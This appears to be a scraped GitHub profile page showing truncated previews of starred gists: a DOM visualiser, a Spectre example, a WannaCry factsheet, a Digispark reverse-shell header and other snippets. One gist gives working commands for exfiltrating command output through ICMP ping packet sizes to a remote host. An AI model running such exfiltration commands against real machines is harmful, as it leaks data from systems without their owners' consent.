Skip to content

Instantly share code, notes, and snippets.

View muellermartin's full-sized avatar

Martin Müller muellermartin

43 followers · 30 following
View GitHub Profile
@OrionReed
OrionReed / dom3d.js
Last active May 7, 2024 18:18
3D DOM viewer, copy-paste this into your console to visualise the DOM topographically.
// 3D Dom viewer, copy-paste this into your console to visualise the DOM as a stack of solid blocks.
// You can also minify and save it as a bookmarklet (https://www.freecodecamp.org/news/what-are-bookmarklets/)
(() => {
const SHOW_SIDES = false; // color sides of DOM nodes?
const COLOR_SURFACE = true; // color tops of DOM nodes?
const COLOR_RANDOM = false; // randomise color?
const COLOR_HUE = 190; // hue in HSL (https://hslpicker.com)
const MAX_ROTATION = 180; // set to 360 to rotate all the way round
const THICKNESS = 20; // thickness of layers
const DISTANCE = 10000; // ¯\\_(ツ)_/¯
@roycewilliams
roycewilliams / clientside-software-update-verification-failures.md
Last active December 16, 2021 16:05
Exploitable vulnerabilities in client-side software update mechanisms that could have been mitigated by secure transport (TLS).

Client-side software update verification failures

Exploitable vulnerabilities in client-side software update mechanisms that could have been mitigated by secure transport (TLS). Contributions welcome. All text taken from the vulnerability descriptions themselves, with additional emphasis mine.

In scope:

  • I consider exploitation or privilege escalation of the package tool/system itself (that would have been mitigated by secure transport) to be in scope.
  • Issues only described as being triggered by malicious mirrors are assumed to also be vulnerable to MITM.
  • Failure to verify the software update at all is currently provisionally in scope if it could have been mitigated by secure transport, but I'm waffling about it. Most of these are actual signature verification failures, and my original purpose was to highlight cases where claims of "It's OK to be HTTP because verification!" seem to me to be specious.
  • Software components regularly used to verify integrity in other software pipelines are
@ErikAugust
ErikAugust / spectre.c
Last active April 15, 2024 13:55
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@andyrbell
andyrbell / scanner.sh
Last active April 5, 2024 09:01
Make a pdf look scanned using ImageMagick
# use ImageMagick convert
# the order is important. the density argument applies to input.pdf and resize and rotate to output.pdf
convert -density 90 input.pdf -rotate 0.5 -attenuate 0.2 +noise Multiplicative -colorspace Gray output.pdf
@georgexsh
georgexsh / goto.py
Created September 18, 2017 07:47
python goto with system trace function
import sys
def j(lineno):
frame = sys._getframe().f_back
called_from = frame
def hook(frame, event, arg):
if event == 'line' and frame == called_from:
try:
frame.f_lineno = lineno
@jobertabma
jobertabma / icmp.md
Last active September 14, 2022 15:02
Commands to exfiltrate command output via ICMP packet size
  1. Capture ICMP packets on your server:
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
  1. Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:
ip=vm03;output=`hostname`;for ((i=0;i&lt;${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active March 10, 2024 11:03 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@jakevdp
jakevdp / OpticalIllusion.ipynb
Last active September 7, 2022 08:58
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@MattOates
MattOates / digispark_macOS_reverse_shell.c
Last active April 11, 2023 01:14
A macOS reverse shell HID hack for use with Digispark USB HID (https://www.aliexpress.com/item/Free-Shipping-CJMCU-Digispark-kickstarter-miniature-for-Arduino-usb-development/32510265413.html)
#include "DigiKeyboard.h"
//Command key is ord 37 and as a modifier 0x00000008
//See NX_DEVICELCMDKEYMASK http://svn.red-bean.com/bob/SDL-altivec/trunk/src/video/quartz/SDL_QuartzEvents.m
//For a look at available keys https://github.com/digistump/DigisparkArduinoIntegration/blob/master/libraries/DigisparkKeyboard/DigiKeyboard.h
#define MOD_CMD_LEFT 0x00000008
boolean do_hack = true;
void setup() {
@avafloww
avafloww / PhpJava.java
Last active October 16, 2022 18:50
This snippet of code is syntactically valid in both PHP and Java, and produces the same output in both.
/*<?php
//*/public class PhpJava { public static void main(String[] args) { System.out.printf("/*%s",
//\u000A\u002F\u002A
class PhpJava {
static function main() {
echo(//\u000A\u002A\u002F
"Hello World!");
}}
//\u000A\u002F\u002A
PhpJava::main();